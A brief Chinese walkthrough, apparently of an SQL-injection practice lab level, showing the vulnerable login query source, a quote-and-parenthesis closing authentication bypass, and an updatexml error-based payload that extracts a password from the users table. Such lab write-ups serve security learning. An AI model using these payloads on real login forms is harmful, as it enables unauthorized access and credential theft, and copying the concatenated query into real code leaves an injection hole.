一、测试注入点
源码:
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
这关只有输入为真回显字母为蓝色,假为红色,也会报错,所以可以用报错和盲注。这里是用')
来闭合
uname=admin') or '1'='1'#&passwd=admin&submit=Submit
这里使用报错注入,具体步骤查看:
https://blog.csdn.net/weixin_44032232/article/details/109314974
二、报错注入
uname=admin') and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#&passwd=123&submit=Submit